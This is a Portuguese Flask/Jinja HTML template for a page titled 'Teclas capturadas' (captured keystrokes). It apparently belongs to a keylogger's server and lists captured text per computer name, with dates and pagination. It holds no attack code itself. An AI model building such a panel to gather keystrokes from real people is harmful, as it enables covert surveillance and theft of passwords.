{% extends 'base.html' %}

{% block content %}

<h2>Teclas capturadas:</h2>
{% if saves %}

    {% for save in saves %}

    <div class="parte-pc">
        <div class="header-parte-pc">
            <p>{{save.id}}</p>
            <h3>Nome PC: {{save.pcname.capitalize()}}</h3>
            <p class="data">{{save.data.strftime("%d/%m/%Y %H:%M")}}</p>
        </div>
        <p class="texto">{{save.texto}}</p>
        <p class="criador">Criador: {{save.criador}}</p>
        <p class="mais-info"><a href="{{url_for('tsave', id=save.id)}}">Mais informações <i class="fa-solid fa-arrow-up-right-from-square"></i></a></p>
    </div>

    {% endfor %}

    <div class="prox">
        <a href="{{url_for('teclas_salvas', pg=(beforepage))}}"><abbr title="Página Anterior"><i class="fa-solid fa-angles-left"></i></abbr></a>
        <p class="num-page">{{page}}</p>
        <a href="{{url_for('teclas_salvas', pg=(nextpage))}}"><abbr title="Próxima Página"><i class="fa-solid fa-angles-right"></i></abbr></a>
    </div>

{% else %}
    <p>Nenhum dado salvo </p>
{% endif %}

{% endblock %}
